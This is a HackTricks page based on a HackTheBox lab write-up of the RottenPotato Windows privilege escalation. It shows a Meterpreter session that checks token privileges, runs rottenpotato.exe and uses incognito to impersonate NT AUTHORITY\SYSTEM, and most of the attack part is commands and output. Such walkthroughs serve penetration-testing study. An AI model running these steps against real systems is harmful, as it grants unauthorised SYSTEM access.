# RottenPotato

HackTricks in 🐦 Twitter 🐦 - 🎙️ Twitch Wed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥

- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.

The info in this page info was extracted [from this post](https://www.absolomb.com/2018-05-04-HackTheBox-Tally/) Service accounts usually have special privileges (SeImpersonatePrivileges) and this could be used to escalate privileges. [https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/) I won’t go into the details on how this exploit works, the article above explains it far better than I ever could. Let’s check our privileges with meterpreter: ``` meterpreter > getprivs Enabled Process Privileges ========================== Name ---- SeAssignPrimaryTokenPrivilege SeChangeNotifyPrivilege SeCreateGlobalPrivilege SeImpersonatePrivilege SeIncreaseQuotaPrivilege SeIncreaseWorkingSetPrivilege ``` Excellent, it looks like we have the privileges we need to perform the attack. Let’s upload `rottenpotato.exe` Back on our meterpreter session we load the `incognito` extension. ``` meterpreter > use incognito Loading extension incognito...Success. meterpreter > list_tokens -u [-] Warning: Not currently running as SYSTEM, not all tokens will beavailable Call rev2self if primary process token is SYSTEM Delegation Tokens Available ======================================== NT SERVICE\SQLSERVERAGENT NT SERVICE\SQLTELEMETRY TALLY\Sarah Impersonation Tokens Available ======================================== No tokens available ``` We can see we currently have no Impersonation Tokens. Let’s run the Rotten Potato exploit. ``` meterpreter > execute -f rottenpotato.exe -Hc Process 3104 created. Channel 2 created. meterpreter > list_tokens -u [-] Warning: Not currently running as SYSTEM, not all tokens will beavailable Call rev2self if primary process token is SYSTEM Delegation Tokens Available ======================================== NT SERVICE\SQLSERVERAGENT NT SERVICE\SQLTELEMETRY TALLY\Sarah Impersonation Tokens Available ======================================== NT AUTHORITY\SYSTEM ``` We need to quickly impersonate the token or it will disappear. ``` meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM" [-] Warning: Not currently running as SYSTEM, not all tokens will beavailable Call rev2self if primary process token is SYSTEM [-] No delegation token available [+] Successfully impersonated user NT AUTHORITY\SYSTEM meterpreter > getuid Server username: NT AUTHORITY\SYSTEM ``` Success! We have our SYSTEM shell and can grab the root.txt file!

HackTricks in 🐦 Twitter 🐦 - 🎙️ Twitch Wed - 18.30(UTC) 🎙️ - 🎥 Youtube 🎥